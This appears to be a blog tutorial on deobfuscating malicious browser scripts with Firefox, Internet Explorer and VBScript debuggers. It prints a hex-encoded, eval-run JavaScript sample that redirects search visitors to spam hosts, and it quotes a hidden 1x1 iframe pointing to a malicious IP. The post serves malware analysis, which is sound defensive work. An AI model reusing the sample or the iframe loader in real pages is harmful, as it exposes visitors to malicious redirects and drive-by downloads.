Takaaki Mori

How to deobfuscate malicious browser scripts using a script debugger

Blog Post created by Takaaki Mori Employee on Dec 31, 2016

<Mozilla>

1.The sample.html file to add the debugger; statement in the beginning of the script

2.load script.html into Firefox using the browser's File 

3.Use Firebug to set a breakpoint on the eval (txt); line of the script.

4.look at contents of the variable "txt"by typingthe console.log(txt) command in Firebug's Console tab.

5.Examine the deobfuscated script in the Console tab

 

 

1.The sample.html file to add the debugger; statement in the beginning of the script

2.load script.html into Firefox using the browser's File 

 

--sample.html-

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="keywords" content="#KEYWORDS#" />
<link rel="copyright" href="http://www.gnu.org/copyleft/fdl.html" />
<title>...Berlin with the appointed export lotus notes address book of...</title>
<script>

debugger;
var arr =

"76617220726566203d20646f63756d656e742e72656665727265723b0d0a766172206c6f63203d20646f63756d656e742e6c6f636174696f6e2e687265663b0d0a696620287265662e696e6465784f662822676f6f676c652229203d3d202d31202626207265662e696e6465784f6628227961686f6f2229203d3d202d31202626207265662e696e6465784f6628226d736e2229203d3d202d3129207b0d0a09646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f61637469766566726565686f73742e636f6d2f72656d6f7665642e7068703f75726c3d22202b206c6f633b0d0a7d20656c7365207b0d0a09696620287265662e696e6465784f662822736974653a2229203e3d2030207c7c207265662e696e6465784f662822736974652533412229203e3d203029207b0d0a0909646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f61637469766566726565686f73742e636f6d2f72656d6f7665642e7068703f75726c3d22202b206c6f633b0d0a097d20656c7365207b0d0a0909766172207265203d206e6577205265674578702822687474703a5c2f5c2f285b612d7a302d395c2d412d5a5c2e5d2a295c2f22293b0d0a090976617220646f6d61696e203d2072652e65786563286c6f63293b0d0a090969662028646f6d61696e203d3d206e756c6c29207b0d0a090909646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f61637469766566726565686f73742e636f6d2f72656d6f7665642e7068703f75726c3d22202b206c6f633b0d0a09097d20656c7365207b0d0a0909097265203d206e65772052656745787028225c5c2e285b612d7a302d395c2d412d5a5c2e5d2a2922293b0d0a090909746f70646f6d61696e203d2072652e6578656328646f6d61696e5b315d293b0d0a090909696620287265662e696e6465784f6628646f6d61696e5b315d2920213d202d31207c7c207265662e696e6465784f6628746f70646f6d61696e5b315d2920213d202d3129207b0d0a09090909646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f61637469766566726565686f73742e636f6d2f72656d6f7665642e7068703f75726c3d22202b206c6f633b0d0a0909097d20656c7365207b0d0a090909097265203d206e6577205265674578702822713d5b5e265d2a22293b0d0a09090909766172206d203d2072652e6578656328726566293b0d0a09090909696620286d203d3d206e756c6c29207b0d0a09090909097265203d206e6577205265674578702822703d5b5e265d2a22293b0d0a09090909096d203d2072652e6578656328726566293b0d0a0909090909696620286d203d3d206e756c6c29207b0d0a090909090909646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f61637469766566726565686f73742e636f6d2f72656d6f7665642e7068703f75726c3d22202b206c6f633b0d0a09090909097d20656c7365207b0d0a0909090909097661722071203d206d5b305d2e737562737472696e672832293b0d0a09090909090971203d20712e7265706c616365282f5c2b2f2c20225f22293b0d0a09090909090971203d20712e7265706c616365282f5c732f2c20225f22293b0d0a090909090909646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f73747570686f6d652e636f6d2f702f22202b2071202b20222e68746d6c223b0d0a09090909097d0d0a090909097d20656c7365207b0d0a09090909097661722071203d206d5b305d2e737562737472696e672832293b0d0a090909090971203d20712e7265706c616365282f5c2b2f2c20225f22293b0d0a090909090971203d20712e7265706c616365282f5c732f2c20225f22293b0d0a0909090909646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f73747570686f6d652e636f6d2f702f22202b2071202b20222e68746d6c223b0d0a090909097d0d0a0909097d0d0a09097d0d0a097d0d0a7d0d0a";

  • var table = new Array();table['0'] = 0;table['1'] = 1;table['2'] = 2;table['3'] = 3;table['4'] = 4;table['5'] = 5;table['6'] = 6;table['7'] = 7;table['8'] = 8;table['9'] = 9;table['a'] = 10;table['b'] = 11;table['c'] = 12;table['d'] = 13;table['e'] = 14;table['f'] = 15;function markCounter(a) { 

    var txt = ""; var c = 0; 

    while (c < a.length) {txt += String.fromCharCode(table[a[c]] * 16 + table[a[c + 1]]); c += 2;} 

    eval(txt);

    →3. to set a breakpoint on the eval (txt); line of the script.

 

 

4.look at contents of the variable "txt"by typingthe console.log(txt) command in Firebug's Console tab.

5.Examine the deobfuscated script in the Console tab

 

 

A***freehost.com

URL, Which is probably malicious.

 

---------------------------------------------------------------------------------------------------------------------------------------------------------

<IE>

 

  1. Edit sample.html in Notepad++ to insert the "debugger;" statement in the beginning of its script.
  2. Open sample.html in Internet Explorer and activate the debugger in Developer Tools.
  3. Reload the script in Internet Explorer to activate the debugger.
  4. Set a breakpoint using the Internet Explorer debugger on the third instance of document. write.
  5. Run the script in the Internet Explorer debugger to deobfuscate its contents and reach the breakpoint.
  6. Copy contents of the variable G82B54 to the clipboard and paste them into Notepad++
  7. Examine the deobfuscated script in Notepad++an d then exit Internet Explorer and the text editor

 

 

 

1.Edit sample.html in Notepad++ to insert the "debugger;" statement in the beginning of its script.

 

 

 

 

2.Open sample.html in Internet Explorer and activate the debugger in Developer Tools.

 

3.Reload the script in Internet Explorer to activate the debugger.

 

 

4.Set a breakpoint using the Internet Explorer debugger on the third instance of document. write.

 

5.Run the script in the Internet Explorer debugger to deobfuscate its contents and reach the breakpoint.

6.Copy contents of the variable G82B54 to the clipboard and paste them into Notepad+

 

 

 

 

7.Examine the deobfuscated script in Notepad++,an d then exit Internet Explorer and the text editor

URL is Malicious Site.

G82B54 "</textarea><iframe src=\http://66.109.***.198/c76c1d2643c69857e1a677d2e0f23f8e/b1fd046f3c05b517d106b003853b1441?p=ftp\ width=1 height=1 style=\"border: 0px\"></iframe>"

 

--------------------------------------------------------------------------------------------------------------------------------------------VBscript

Using the Cscript Interpreter

 

1.Right-click vbscript.vbs and select Edit with Notepad++.A dd the following code in the beginning of the file,
2.redefining the execute function so that instead of executing its argument,

 

Function execute(x)
SCript.Echo(x)
End Function

 

 

 

 

cscript > vbscript.vbs > out.txt

read out.txt

 

 

1390***.cn URl is Malicious Site.

Outcomes